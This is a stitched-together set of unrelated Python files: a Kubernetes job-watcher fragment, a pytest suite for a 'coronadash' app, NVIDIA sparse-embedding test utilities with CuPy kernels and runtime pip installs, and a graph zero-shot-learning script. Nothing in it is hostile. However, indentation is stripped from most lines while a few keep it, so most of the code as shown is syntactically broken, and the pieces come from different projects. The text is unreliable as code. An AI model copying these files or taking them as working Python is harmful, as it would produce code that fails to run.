c = k8s.client.CoreV1Api()
try:
for e in w.stream(c.list_namespaced_event,
namespace=self.namespace,
timeout_seconds=5):
if self.thread_stop.is_set():
return
eo = e.get('object')
self.logger.info('Event: %s (reason=%s)', eo.message,
eo.reason)
for uuid in self.components:
comp = self.components[uuid]
if not comp.job:
continue
if _match(comp.job.metadata.name,
eo.involved_object.name):
if eo.reason == 'Completed':
comp.change_state('stopping', True)
elif eo.reason == 'Started':
comp.pods.add(eo.involved_object.name)
comp.change_state('running', True)
elif eo.reason == 'BackoffLimitExceeded':
comp.change_to_error('failed to start job',
reason=eo.reason)
elif eo.reason == 'Failed':
if comp._state == 'running':
comp.change_to_error('failed to start job',
error=eo.reason)
elif comp._state == 'starting':
# wait for BackoffLimitExceeded event
continue
else:
self.logger.info('Reason \'%s\' not handled '
'for kubernetes simulator',
eo.reason)
            except ProtocolError:
                self.logger.warning('Connection to kubernetes broken, '
                                    'attempting reconnect...')
                time.sleep(1)
def create(self, payload):
parameters = payload.get('parameters', {})
comp = KubernetesJob(self, **parameters)
self.add_component(comp)
def delete(self, payload):
parameters = payload.get('parameters')
uuid = parameters.get('uuid')
try:
comp = self.components[uuid]
comp.on_delete()
self.remove_component(comp)
except KeyError:
self.logger.error('There is no component with UUID: %s', uuid)
def on_shutdown(self):
self.logger.info('Stopping Kubernetes watchers')
self.thread_stop.set()
if self.pod_watcher_thread.is_alive():
self.pod_watcher_thread.join()
if self.job_watcher_thread.is_alive():
self.job_watcher_thread.join()
if self.event_watcher_thread.is_alive():
self.event_watcher_thread.join()
return super().on_shutdown()
|
pow_tests.py
|
#
# Pow Default Tests
#
#
# runtest script.
# runs tests with respect to some parameters
# currently only os
import sys
import pytest
# possible sys.platform results:
# http://stackoverflow.com/questions/446209/possible-values-from-sys-platform
MODELNAME = "pow_test_model"
class TestClass:
@pytest.mark.notonosx
@pytest.mark.run(order=1)
@pytest.mark.minimal
def test_server(self):
""" test if server starts
calls baseurl:port/test/12
must return 12.
This test the server, routing and method dispatching
"""
print(" .. Test if server works" )
from multiprocessing import Process
import coronadash.server
import requests
import coronadash.conf.config as cfg
import time
p = Process(target=coronadash.server.main)
p.start()
testurl=cfg.server_settings["protocol"] + cfg.server_settings["host"] + ":" + str(cfg.server_settings["port"]) + "/test/12"
r = requests.get(testurl)
p.terminate()
assert int(r.text)==12
@pytest.mark.run(order=2)
@pytest.mark.minimal
def test_sql_generate_model(self):
""" test if sql model is generated"""
print(" .. Test generate_model")
import coronadash.generate_model as gm
import uuid
import os.path
ret = gm.generate_model(MODELNAME, "sql", appname="coronadash")
# generate model returns true in case of success
assert ret is True
assert os.path.exists(os.path.normpath("../models/sql/" + MODELNAME + ".py"))
@pytest.mark.run(order=3)
@pytest.mark.minimal
def test_sql_model_type(self):
""" based on test_generate_model. Tests if a model can insert values
DB sqlite by default.
"""
print(" .. Test model is correct type")
from coronadash.models.sql.pow_test_model import PowTestModel
m = PowTestModel()
assert isinstance(m, PowTestModel)
@pytest.mark.run(order=4)
def test_sql_dbsetup(self):
""" test the setup of the alembic environment """
print(" .. Test SQL: db_setup")
import coronadash.init_sqldb_environment
import os
os.chdir("..")
r = coronadash.init_sqldb_environment.init_migrations()
assert r == True
os.chdir(os.path.abspath(os.path.dirname(__file__)))
@pytest.mark.run(order=5)
def test_sql_migration(self):
""" test the setup of the alembic environment
generate a migration
"""
print(" .. Test SQL: generate_migration")
import coronadash.generate_migration
import os
os.chdir("..")
script = coronadash.generate_migration.generate_migration(message="pow_test")
assert os.path.exists(os.path.normpath(script.path))
os.chdir(os.path.abspath(os.path.dirname(__file__)))
@pytest.mark.run(order=6)
def test_sql_dbupdate(self):
""" test the setup of the alembic environment
actually migrate the DB schema up
"""
print(" .. Test SQL: update_db -d up")
import coronadash.update_db
import os, time
ret = None
os.chdir("..")
time.sleep(1)
try:
ret = coronadash.update_db.migrate("up")
except Exception as e:
print(e)
ret = True
time.sleep(5)
os.chdir(os.path.abspath(os.path.dirname(__file__)))
@pytest.mark.run(order=7)
def test_if_sql_model_validation_works(self):
"""
check if validation works
"""
print(" .. Test SQL: model.upsert() and model.find()")
from coronadash.models.sql.pow_test_model import PowTestModel
m = PowTestModel()
assert m.validate() == True
@pytest.mark.run(order=8)
def test_if_sql_model_validation_fails_successfully(self):
"""
check if validation fails if type is wrong
"""
print(" .. Test SQL: model.upsert() and model.find()")
from coronadash.models.sql.pow_test_model import PowTestModel
m = PowTestModel()
m.title="123456789123456789123456789123456789"
assert m.validate() == False
@pytest.mark.run(order=9)
def test_sql_insert_and_find(self):
""" based on test_generate_model.
Tests if a model can insert values in the DB
and can be found by title attribute.
"""
print(" .. Test SQL: model.upsert() and model.find()")
from coronadash.models.sql.pow_test_model import PowTestModel
import os
m = PowTestModel()
m.title = "TestnamePowTestRunner"
m.upsert()
res=m.find(PowTestModel.title=="TestnamePowTestRunner")
assert res.count()==1
m.session.close()
os.chdir(os.path.abspath(os.path.dirname(__file__)))
#
# tinyDB tests
#
@pytest.mark.run(order=10)
@pytest.mark.minimal
def test_tinydb_generate_model(self):
""" test if sql model is generated"""
print(" .. Test tinyDB generate_model")
import coronadash.generate_model as gm
import uuid
import os.path
ret = gm.generate_model(MODELNAME, "tinydb", appname="coronadash")
# generate model returns true in case of success
assert ret is True
assert os.path.exists(os.path.normpath("../models/tinydb/" + MODELNAME + ".py"))
@pytest.mark.run(order=11)
@pytest.mark.minimal
def test_if_tinydb_model_validation_works(self):
"""
check if validation works
"""
print(" .. Test SQL: model.upsert() and model.find()")
from coronadash.models.tinydb.pow_test_model import PowTestModel
m = PowTestModel()
assert m.validate() == True
@pytest.mark.run(order=12)
@pytest.mark.minimal
def test_if_tinydb_model_validation_fails_successfully(self):
"""
check if validation fails if type is wrong
"""
print(" .. Test SQL: model.upsert() and model.find()")
from coronadash.models.tinydb.pow_test_model import PowTestModel
m = PowTestModel()
m.title="123456789123456789123456789123456789"
assert m.validate() == False
@pytest.mark.run(order=13)
@pytest.mark.minimal
def test_tinydb_model_type(self):
""" based on test_generate_model. Tests if a model can insert values
DB sqlite by default.
"""
print(" .. Test model tinyDB is correct type")
from coronadash.models.tinydb.pow_test_model import PowTestModel
m = PowTestModel()
assert isinstance(m, PowTestModel)
@pytest.mark.run(order=14)
def test_tinydb_insert_and_find(self):
""" based on test_generate_model. Tests if a model can insert values
and can be found back.
"""
print(" .. Test tinyDB: model.upsert() and model.find()")
from coronadash.models.tinydb.pow_test_model import PowTestModel
import os
m = PowTestModel()
m.title = "TestnamePowTestRunner"
m.upsert()
res=m.find(m.Query.title=="TestnamePowTestRunner")
assert res
m.db.close()
os.chdir(os.path.abspath(os.path.dirname(__file__)))
if __name__ == "__main__":
print(55*"-")
print(" running pow Tests on: " + sys.platform)
print(" ... ")
if sys.platform.startswith("darwin"):
# osx
ret = pytest.main(["-k-notonosx", "pow_tests.py"])
else:
ret = pytest.main(["pow_tests.py"])
print(" Failures: " +str(ret))
print(55*"-")
|
utils.py
|
"""
Copyright (c) 2021, NVIDIA CORPORATION.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys, os
sys.path.append(os.path.abspath(os.path.join(
os.path.dirname(os.path.abspath(__file__)), r"../../../")))
import sparse_operation_kit as sok
import tensorflow as tf
import pickle
import numpy as np
from multiprocessing import Process
local_ips = ("localhost", "127.0.0.1", "0.0.0.0")
def get_local_ip(hostname=None):
    import socket
    return socket.gethostbyname(hostname or socket.gethostname())
def is_local_ip(ip_address):
    return ip_address in local_ips
def all_ips_in_local(ips):
for ip in ips:
if not is_local_ip(ip):
return False
return True
def get_local_gpu_count():
import os
text = os.popen("nvidia-smi --list-gpus").read()
text = text.strip().split("\n")
return len(text)
def get_cuda_version():
import os, re
text = os.popen("nvcc --version").read()
version = text.strip().split("\n")[-1]
version = re.search("cuda_\d+.\d+.", version).group(0)
version = re.search("\d+.\d+", version).group(0)
return version
class TestProcess(object):
def __init__(self,
func,
task_id,
arguments):
self.func = func
self.task_id = task_id
self.arguments = arguments
self.arguments.task_id = self.task_id
self.process = Process(target=self.func, args=(self.arguments,))
def start(self):
self.process.start()
def join(self):
if self.process.is_alive():
self.process.join()
def save_to_file(filename, *args):
with open(filename, 'wb') as file:
num_of_items = len(args)
if (num_of_items == 0):
raise ValueError("Nothing needed to be saved.")
pickle.dump(num_of_items, file, pickle.HIGHEST_PROTOCOL)
for item in args:
pickle.dump(item, file, pickle.HIGHEST_PROTOCOL)
print("[INFO]: dumpped items to file %s" %filename)
def restore_from_file(filename):
results = list()
with open(filename, "rb") as file:
num_of_items = pickle.load(file)
for _ in range(num_of_items):
item = pickle.load(file)
results.append(item)
print("[INFO] loadded from file %s" %filename)
return tuple(results)
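# Hedged round-trip sketch (added for illustration; the file path is an arbitrary
# placeholder): save_to_file and restore_from_file are symmetric, so dumping n objects
# and loading them back should return the same objects as a tuple.
def _pickle_roundtrip_demo(filename="/tmp/sok_demo_items.pkl"):
    a, b = [1, 2, 3], {"lr": 0.001}
    save_to_file(filename, a, b)
    restored_a, restored_b = restore_from_file(filename)
    assert restored_a == a and restored_b == b
    return restored_a, restored_b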
def get_embedding_optimizer(optimizer_type):
if not isinstance(optimizer_type, str):
raise ValueError("optimizer_type must be str type, but got ", type(optimizer_type))
if optimizer_type == "plugin_adam":
return sok.optimizers.Adam
elif optimizer_type == 'adam':
return tf.keras.optimizers.Adam
elif optimizer_type == 'sgd':
return tf.keras.optimizers.SGD
else:
raise ValueError("Not supported optimizer_type: %s" %optimizer_type)
def get_dense_optimizer(optimizer_type):
if not isinstance(optimizer_type, str):
raise ValueError("optimizer_type must be str type, but got ", type(optimizer_type))
if optimizer_type == "plugin_adam":
return tf.keras.optimizers.Adam
elif optimizer_type == 'adam':
return tf.keras.optimizers.Adam
elif optimizer_type == 'sgd':
return tf.keras.optimizers.SGD
else:
raise ValueError("Not supported optimizer_type: %s" %optimizer_type)
def get_ones_tensor(max_vocab_size_per_gpu,
embedding_vec_size,
num,
task_id=None):
tensor = np.ones(shape=[max_vocab_size_per_gpu, embedding_vec_size], dtype=np.float32)
all_tensors = [tensor for _ in range(num)]
return all_tensors
def get_random_value(shape, dtype=None):
tensor = np.random.normal(size=shape)
tensor = tensor.astype(np.float32)
return tensor
def generate_random_samples(num_of_samples,
vocabulary_size,
slot_num,
max_nnz,
dtype=np.int64,
use_sparse_mask=True):
"""
This function is used to generate random samples used for training.
#args:
num_of_samples: integer, how many samples should be generated.
vocabulary_size: integer,
slot_num: integer,
max_nnz: integer
        use_sparse_mask: boolean, whether to use a sparse mask to generate sparse data
#returns:
all_keys: dense tensor, whose shape is [num_of_samples, slot_num, max_nnz]
all_labels: dense tensor, whose shape is [num_of_samples, 1]
"""
print("[INFO]: begin to generate random samples")
from tensorflow.python.distribute.values import PerReplica
cuda_version = get_cuda_version()
cuda_version = "".join(cuda_version.split("."))
try:
import cupy as cp
except:
import os
os.system("pip install cupy-cuda"+cuda_version)
import cupy as cp
if (vocabulary_size // slot_num <= 2 * max_nnz):
raise ValueError("Too small vocabulary_size. vocabulary_size: %d // slot_num: %d = %d <= 2 * max_nnz: %d"
%(vocabulary_size, slot_num, vocabulary_size // slot_num, 2 * max_nnz))
if use_sparse_mask:
mask = np.random.choice([-1, 1], size=(num_of_samples, slot_num, max_nnz))
filter_ = np.ones(shape=(num_of_samples, slot_num, max_nnz))
sum_ = np.sum(mask * filter_, axis=-1, keepdims=True)
index = np.where(sum_ == -max_nnz)
index = tuple(map(lambda array: array[1:] if array.ndim and array.size else array, index))
mask[index] = 1
with cp.cuda.Device(0):
all_keys = cp.zeros(shape=(num_of_samples, slot_num, max_nnz), dtype=cp.int64)
random_kernel = cp.RawKernel(r'''
__device__ size_t randInt(size_t gid, const size_t range) {
return (((gid * clock() * 214013L + 2531011L) >> 16) & 0x7fff) % range;
}
extern "C" __global__
void my_kernel(long long *nums, const size_t count,
const size_t slot_num, const size_t max_nnz,
const size_t vocab_per_slot) {
size_t gid = blockIdx.x * blockDim.x + threadIdx.x;
for (size_t i = gid; i < count; i += blockDim.x * gridDim.x) {
size_t tid_in_sample = i % (slot_num * max_nnz);
size_t slot_id = tid_in_sample / max_nnz;
size_t col_id = tid_in_sample % max_nnz;
nums[i] = vocab_per_slot * slot_id + randInt(gid, vocab_per_slot);
}
}
''', 'my_kernel')
random_kernel((num_of_samples,), (1024,),
(all_keys, num_of_samples * slot_num * max_nnz,
slot_num, max_nnz, vocabulary_size // slot_num))
all_keys = all_keys.get()
if use_sparse_mask:
all_keys[mask == -1] = -1
all_keys = np.sort(all_keys, axis=-1)[:,:,::-1]
all_labels = np.random.randint(low=0, high=2, size=(num_of_samples, 1))
print("[INFO]: generated random samples")
return all_keys, all_labels
def tf_dataset(keys, labels,
batchsize,
to_sparse_tensor=False,
repeat=None,
args=None):
num_of_samples, slot_num, max_nnz = keys.shape
def _convert_to_sparse(keys, labels):
if tf.rank(keys) != 2:
keys = tf.reshape(keys, shape=[-1, max_nnz])
indices = tf.where(keys != -1)
values = tf.gather_nd(keys, indices)
if args is not None and hasattr(args, "key_dtype"):
if args.key_dtype == "int64":
values = tf.cast(values, dtype=tf.int64)
elif args.key_dtype == "uint32":
values = tf.cast(values, dtype=tf.uint32)
else:
raise ValueError("Not supported key_dtype.")
return tf.sparse.SparseTensor(indices=indices,
values=values,
dense_shape=[batchsize * slot_num, max_nnz]), labels
def _cast_values(keys, labels):
if args is not None and hasattr(args, "key_dtype"):
if args.key_dtype == "int64":
keys = tf.cast(keys, dtype=tf.int64)
elif args.key_dtype == "uint32":
keys = tf.cast(keys, dtype=tf.uint32)
else:
raise ValueError("Not supported key_dtype.")
return keys, labels
dataset = tf.data.Dataset.from_tensor_slices((keys, labels))
dataset = dataset.repeat(repeat)
dataset = dataset.batch(batchsize, drop_remainder=True)
if to_sparse_tensor:
dataset = dataset.map(lambda keys, labels:
_convert_to_sparse(keys, labels),
num_parallel_calls=1)
else:
dataset = dataset.map(lambda keys, labels:
_cast_values(keys, labels),
num_parallel_calls=1)
return dataset
def try_make_dirs(directory, chief=True):
import os
if not os.path.exists(directory) and chief:
os.makedirs(directory)
def sort_embedding_variables_by_key(keys, embedding_values, embedding_vec_size, use_hashtable=True, gpu_num=None):
"""
    This function is used to sort the embedding values by their relevant keys.
For example, keys: [5, 3, 6, 1], embedding values: [[0, 0, 0, 0],
[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3]]
After sorted, keys: [1, 3, 5, 6], embedding values: [[3, 3, 3, 3],
[1, 1, 1, 1],
[0, 0, 0, 0],
[2, 2, 2, 2]]
"""
cuda_version = get_cuda_version()
cuda_version = "".join(cuda_version.split("."))
try:
import cupy as cp
except:
import os
os.system("pip install cupy-cuda"+cuda_version)
import cupy as cp
if not isinstance(keys, np.ndarray):
keys = np.array(keys, dtype=np.int64)
if not isinstance(embedding_values, np.ndarray):
embedding_values = np.array(embedding_values, dtype=np.float32)
# currently, embedding will set a fast hashtable when user specified use_hashtable=False
# so that the following code snippet is not needed.
"""
if not use_hashtable:
vocabulary_size = np.size(keys) // gpu_num
embedding_values = np.reshape(embedding_values, newshape=(-1, embedding_vec_size))
embedding_values_list = np.split(embedding_values, gpu_num, axis=0)
for gpu_id, emb_values in enumerate(embedding_values_list):
invalid_keys = np.array([key for key in range(vocabulary_size) if key % gpu_num != gpu_id], dtype=np.int64)
emb_values[invalid_keys] = 0
valid_embedding_values = np.sum(embedding_values_list, axis=0)
return keys[:vocabulary_size], valid_embedding_values
else:
del gpu_num
"""
sorted_indexes = np.argsort(keys)
sorted_keys = keys[sorted_indexes]
with cp.cuda.Device(0):
d_sorted_values = cp.zeros(shape=embedding_values.shape, dtype=cp.float32)
d_sorted_indexes = cp.asarray(sorted_indexes)
d_embedding_values = cp.asarray(embedding_values)
sort_values_kernel = cp.RawKernel(r'''
extern "C" __global__
void my_kernel(const size_t *sorted_indexes,
const float *values,
float *sorted_values,
const size_t values_step,
const size_t count) {
const size_t col_id = threadIdx.x;
for (size_t row_id = blockIdx.x; row_id < count; row_id += blockDim.x) {
sorted_values[row_id * values_step + col_id] =
values[sorted_indexes[row_id] * values_step + col_id];
}
}
''', 'my_kernel')
sort_values_kernel((keys.size,), (embedding_vec_size,),
(d_sorted_indexes, d_embedding_values, d_sorted_values,
embedding_vec_size, keys.size))
sorted_values = d_sorted_values.get()
return sorted_keys, sorted_values
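# Minimal NumPy-only sketch (added for illustration, not part of the original module):
# the CUDA gather kernel above is equivalent to fancy indexing with argsort, which is
# convenient for sanity-checking results on hosts without cupy. With the docstring
# example, keys [5, 3, 6, 1] come back as [1, 3, 5, 6] and the value rows follow them.
def _sort_embedding_variables_by_key_numpy(keys, embedding_values):
    keys = np.asarray(keys, dtype=np.int64)
    embedding_values = np.asarray(embedding_values, dtype=np.float32)
    order = np.argsort(keys)
    return keys[order], embedding_values[order]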
def read_binary_file(filename,
element_type,
chunk_num_elements=65536):
import struct, os
element_type_map = {"float": ["f", 4],
"int32": ["i", 4],
"long long": ["q", 8],
"unsigned long long": ["Q", 8],
"size_t": ["N", 8],
"unsigned int": ["I", 4]}
elem_size_in_bytes = element_type_map[element_type][1]
file_size_in_bytes = os.path.getsize(filename)
if (file_size_in_bytes % elem_size_in_bytes != 0):
raise ValueError("Invalid element size for file: %s." %filename)
chunk_size_in_bytes = chunk_num_elements * elem_size_in_bytes
if (file_size_in_bytes <= chunk_size_in_bytes):
chunk_size_in_bytes = file_size_in_bytes
chunk_count = 1
else:
chunk_count = file_size_in_bytes // chunk_size_in_bytes
results = list()
with open(filename, "rb") as file:
for _ in range(chunk_count):
buffer = file.read(chunk_size_in_bytes)
if (0 == len(buffer)):
raise RuntimeError("Error in reading file.")
elements = struct.unpack(str(chunk_size_in_bytes // elem_size_in_bytes) +
element_type_map[element_type][0],
buffer)
results += elements
if (file_size_in_bytes - chunk_count * chunk_size_in_bytes > 0):
buffer_size_in_bytes = file_size_in_bytes - chunk_count * chunk_size_in_bytes
buffer = file.read(buffer_size_in_bytes)
elements = struct.unpack(str(buffer_size_in_bytes // elem_size_in_bytes) +
element_type_map[element_type][0],
buffer)
results += elements
return results
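# Hedged round-trip sketch (added for illustration; path and values are placeholders):
# write a few int64 values with struct.pack and read them back with read_binary_file
# using the "long long" element type, which the table above maps to format "q" (8 bytes).
def _read_binary_file_roundtrip_demo(filename="/tmp/sok_demo_values.bin"):
    import struct
    values = [1, 2, 3, 42]
    with open(filename, "wb") as f:
        f.write(struct.pack(str(len(values)) + "q", *values))
    restored = read_binary_file(filename, element_type="long long")
    assert list(restored) == values
    return restored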
def get_valid_tf_values(keys, values):
if not isinstance(keys, np.ndarray):
keys = np.array(keys, dtype=np.int64)
if not isinstance(values, np.ndarray):
values = np.array(values, dtype=np.float32)
keys = tf.reshape(keys, [-1])
return tf.gather(values, keys).numpy()
if __name__ == "__main__":
all_keys, all_labels = generate_random_samples(num_of_samples=65536 * 100,
vocabulary_size=8 * 1024 * 1,
slot_num=10,
max_nnz=4,
use_sparse_mask=False)
# print("all_keys:\n", all_keys)
# print("all_labels:\n", all_labels)
dataset = tf_dataset(keys=all_keys, labels=all_labels,
batchsize=65536,
to_sparse_tensor=False,
repeat=1)
for i, (input_tensors, labels) in enumerate(dataset):
print("-"*30, "Iteration ", str(i), "-"*30)
print(input_tensors)
print(labels)
# a = [1, 2, 3]
# b = [4, 5]
# save_to_file("./test.file", a, b)
# a = restore_from_file("./test.file")
# print(a)
# local_ip = get_local_ip()
# print("local_ip: %s" %local_ip)
# keys = np.array([5, 3, 6, 1], dtype=np.int64)
# values = np.array([[0, 0, 0, 0],
# [1, 1, 1, 1],
# [2, 2, 2, 2],
# [3, 3, 3, 3]], dtype=np.float32)
# sorted_keys, sorted_values = sort_embedding_variables_by_key(keys, values, embedding_vec_size=4)
# print(sorted_keys)
# print(sorted_values)
# filename = r"./embedding_variables/test_values.file"
# keys = read_binary_file(filename, element_type="float")
# print(len(keys))
# keys = [5, 3, 6, 1]
# values = [[0, 0],
# [1, 1],
# [2, 2],
# [3, 3],
# [4, 4],
# [5, 5],
# [6, 6]]
# print(get_valid_tf_values(keys, values))
|
graph_ZSL_w_argmin.py
|
import json
import multiprocessing
from datetime import datetime
from node2vec import Node2Vec
import pandas as pd
import numpy as np
import networkx as nx
import pickle
import os
import argparse
from numpy import linalg as la
from sklearn.metrics.pairwise import cosine_similarity
from sklearn import model_selection as sk_ms
from sklearn.metrics import confusion_matrix
from sklearn.multiclass import OneVsRestClassifier
from sklearn.linear_model import LogisticRegression
import random
import math
import matplotlib as mpl
import matplotlib.pyplot as plt
from itertools import chain
from utils import set_gpu
from utlis_graph_zsl import hist_plot, plot_confusion_matrix, plots_2measures_vs_parameter, grid
from IMDb_data_preparation_E2V import MoviesGraph
random.seed(0)
np.random.seed(0)
HEADER = ['movie_weights',
'labels_weights',
'embedding_type',
'embedding_dimension',
'norma_type',
'class_edges_threshold',
'seen_percentage',
'data_name',
'awa2_attributes_weight',
'acc',
'seen_acc',
'unseen_acc']
class GraphImporter:
"""
class that responsible to import or create the relevant graph
"""
def __init__(self, args):
self.data_name = args.data_name
self.graph_percentage = args.graph_percentage
self.threshold = args.threshold
self.args = args
def import_imdb_multi_graph(self, weights):
"""
Make our_imdb multi graph using class
:param weights:
:return:
"""
weights_dict = {'movies_edges': weights[0], 'labels_edges': weights[1]}
dict_paths = {'cast': 'data_set/IMDb title_principals.csv', 'genre': 'data_set/IMDb movies.csv'}
imdb = MoviesGraph(dict_paths, self.args.graph_percentage)
gnx = imdb.create_graph()
labels = imdb.labels2int(gnx)
knowledge_gnx, knowledge_data = imdb.create_knowledge_graph(labels, self.threshold)
multi_gnx = imdb.weighted_multi_graph(gnx, knowledge_gnx, labels, weights_dict)
return multi_gnx
def import_imdb_weighted_graph(self, weights):
weights_dict = {'movies_edges': weights[0], 'labels_edges': weights[1]}
dict_paths = {'cast': 'data_set/IMDb title_principals.csv', 'genre': 'data_set/IMDb movies.csv'}
imdb = MoviesGraph(dict_paths, self.args.graph_percentage)
gnx = imdb.create_graph()
labels = imdb.labels2int(gnx)
knowledge_gnx, knowledge_data = imdb.create_knowledge_graph(labels, float(self.threshold))
weighted_graph = imdb.weighted_graph(gnx, knowledge_gnx, labels, weights_dict)
return weighted_graph
def import_graph(self):
graph = nx.MultiGraph()
data_path = self.data_name + '.txt'
path = os.path.join(self.data_name, data_path)
with open(path, 'r') as f:
for line in f:
items = line.strip().split()
att1 = str(items[0][0])
att2 = str(items[1][0])
graph.add_node(items[0], key=att1)
graph.add_node(items[1], key=att2)
sort_att = np.array([att1, att2])
sort_att = sorted(sort_att)
graph.add_edge(items[0], items[1], key=str(sort_att[0]) + str(sort_att[1]))
return graph
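    # Editor's illustration (format inferred from the parser above, not documented elsewhere):
    # each line of <data_name>/<data_name>.txt is expected to hold two whitespace-separated
    # node ids whose first character encodes the node type, e.g.
    #   m_101 c_7
    #   m_101 m_205
    # which adds nodes keyed 'm'/'c' and edges keyed by the sorted type pair ('cm' / 'mm').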
def import_awa2_graph(self, awa2_weights, specific_split, att_weight):
from images_graph_creator import Awa2GraphCreator, ImagesEmbeddings
weights_dict = {'classes_edges': awa2_weights[0], 'labels_edges': awa2_weights[1]}
set_gpu(self.args.gpu)
graph_preparation = ImagesEmbeddings(self.args)
dict_name_class, dict_class_name = graph_preparation.dict_name_class, graph_preparation.dict_class_name
seen_classes, unseen_classes = graph_preparation.seen_classes, graph_preparation.unseen_classes
embeds_matrix, dict_image_embed, dict_image_class = graph_preparation.images_embed_calculator()
dict_idx_image_class = {i: dict_name_class[dict_image_class[image]]
for i, image in enumerate(list(dict_image_class.keys()))}
awa2_graph_creator = Awa2GraphCreator(embeds_matrix, dict_image_embed, dict_name_class, dict_idx_image_class,
self.args.graph_percentage, self.args)
image_graph = awa2_graph_creator.create_image_graph()
kg, dict_class_nodes_translation = awa2_graph_creator.imagenet_knowledge_graph()
kg = awa2_graph_creator.attributed_graph(kg, att_weight)
seen_classes = [dict_class_nodes_translation[c] for c in seen_classes]
unseen_classes = [dict_class_nodes_translation[c] for c in unseen_classes]
split = {'seen': seen_classes, 'unseen': unseen_classes}
labels_graph = awa2_graph_creator.create_labels_graph(dict_class_nodes_translation)
awa2_graph = awa2_graph_creator.weighted_graph(image_graph, kg, labels_graph, weights_dict)
nx.write_gpickle(awa2_graph, 'awa2/train/awa2_graph')
if specific_split:
return awa2_graph, split
else:
split = None
return awa2_graph, split
class EmbeddingCreator(object):
def __init__(self, graph=None, dimension=None, args=None):
self.data_name = args.data_name
self.dim = dimension
self.graph = graph
def create_node2vec_embeddings(self):
# path1 = os.path.join(self.data_name, 'Node2Vec_embedding.pickle')
# path2 = os.path.join(self.data_name, 'Node2Vec_embedding.csv')
# if os.path.exists(path1):
# with open(path1, 'rb') as handle:
# dict_embeddings = pickle.load(handle)
# elif os.path.exists(path2):
# embedding_df = pd.read_csv(path2)
# dict_embeddings = embedding_df.to_dict(orient='list')
# with open(path2, 'wb') as handle:
# pickle.dump(dict_embeddings, handle, protocol=3)
# else:
# node2vec = Node2Vec(self.graph, dimensions=16, walk_length=30, num_walks=200, workers=1)
# model = node2vec.fit()
# nodes = list(self.graph.nodes())
# dict_embeddings = {}
# for i in range(len(nodes)):
# dict_embeddings.update({nodes[i]: np.asarray(model.wv.get_vector(nodes[i]))})
# with open(path1, 'wb') as handle:
# pickle.dump(dict_embeddings, handle, protocol=3)
node2vec = Node2Vec(self.graph, dimensions=self.dim, walk_length=80, num_walks=16, workers=2)
model = node2vec.fit()
nodes = list(self.graph.nodes())
dict_embeddings = {}
for i in range(len(nodes)):
dict_embeddings.update({nodes[i]: np.asarray(model.wv.get_vector(str(nodes[i])))})
return dict_embeddings
def create_event2vec_embeddings(self):
data_path = self.data_name + '_e2v_embeddings.txt'
path = os.path.join(self.data_name, data_path)
cond = 0
dict_embeddings = {}
with open(path, 'r') as f:
for line in f:
if cond == 1:
items = line.strip().split()
dict_embeddings[items[0]] = items[1:]
cond = 1
return dict_embeddings
def create_ogre_embeddings(self, user_initial_nodes_choice=None):
from StaticGraphEmbeddings.our_embeddings_methods.static_embeddings import StaticEmbeddings
if user_initial_nodes_choice is not None:
static_embeddings = StaticEmbeddings(self.data_name, self.graph, initial_size=100, initial_method="node2vec", method="OGRE", H=user_initial_nodes_choice,
dim=self.dim, choose="degrees", regu_val=0, weighted_reg=False, epsilon=0.1, file_tags=None)
else:
static_embeddings = StaticEmbeddings(self.data_name, self.graph, dim=self.dim)
dict_embeddings = static_embeddings.dict_embedding
return dict_embeddings
class EdgesPreparation:
def __init__(self, graph, args, split=None):
self.args = args
# self.multi_graph = multi_graph
self.split = split
self.graph = graph
self.label_edges = self.make_label_edges()
self.unseen_edges, self.test_edges, self.dict_test_edges, self.dict_train_edges, self.dict_unseen_edges \
= self.train_test_unseen_split()
def make_label_edges(self):
"""
Make a list with all the edge from type "labels_edges", i.e. edges between a movie and its class.
:return: list with labels_edges
"""
data_path = self.args.data_name + '_true_edges.pickle'
nodes = list(self.graph.nodes)
label_edges = []
for node in nodes:
if str(node)[0] == 'c':
info = self.graph._adj[node]
neighs = list(info.keys())
for neigh in neighs:
if info[neigh]['key'] == 'labels_edges':
label_edges.append([node, neigh])
try:
with open(os.path.join(self.args.data_name, data_path), 'wb') as handle:
pickle.dump(label_edges, handle, protocol=3)
except:
pass
return label_edges
@staticmethod
def label_edges_classes_ordered(edge_data):
"""
Make a dict of classes and their labels_edges they belong to. For every label_edge
there is only one class it belongs to.
:return: a dict of classes and their labels_edges
"""
dict_class_label_edge = {}
for edge in edge_data:
if edge[0][0] == 'c':
label = edge[0]
else:
label = edge[1]
if dict_class_label_edge.get(label) is not None:
edges = dict_class_label_edge[label]
edges.append(edge)
dict_class_label_edge[label] = edges
else:
dict_class_label_edge.update({label: [edge]})
return dict_class_label_edge
def train_test_unseen_split(self): # unseen edges
ratio = self.args.ratio[0]
dict_true_edges = self.label_edges_classes_ordered(self.label_edges)
classes = list(dict_true_edges.keys())
for i, k in enumerate(sorted(dict_true_edges, key=lambda x: len(dict_true_edges[x]), reverse=True)):
classes[i] = k
seen_classes = classes[:int(self.args.seen_percentage * len(classes))]
unseen_classes = classes[int(self.args.seen_percentage * len(classes)):]
if self.split is not None:
seen_classes = self.split['seen']
unseen_classes = self.split['unseen']
# unseen_classes.append(classes[0])
unseen_edges, seen_edges, train_edges, test_edges = [], [], [], []
for c in unseen_classes:
# class_edges = list(self.graph.edges(c))
# for edge in class_edges:
# self.graph[edge[0]][edge[1]]['weight'] *= 10
for edge in dict_true_edges[c]:
unseen_edges.append(edge)
for c in seen_classes:
seen_edges_c = []
for edge in dict_true_edges[c]:
seen_edges.append(edge)
seen_edges_c.append(edge)
random.Random(4).shuffle(seen_edges_c)
train_edges_c = seen_edges_c[:int(ratio * len(seen_edges_c))]
test_edges_c = seen_edges_c[int(ratio * len(seen_edges_c)):]
for edge in train_edges_c:
train_edges.append(edge)
if len(test_edges_c) > 0:
for edge in test_edges_c:
test_edges.append(edge)
# unseen_edges = [dict_true_edges[c] for c in unseen_classes]
# seen_edges = [dict_true_edges[c] for c in seen_classes]
# random.Random(4).shuffle(seen_edges)
# train_edges = seen_edges[:int(ratio * len(seen_edges))]
# test_edges = seen_edges[int(ratio * len(seen_edges)):]
dict_train_edges = self.label_edges_classes_ordered(train_edges)
dict_test_edges = self.label_edges_classes_ordered(test_edges)
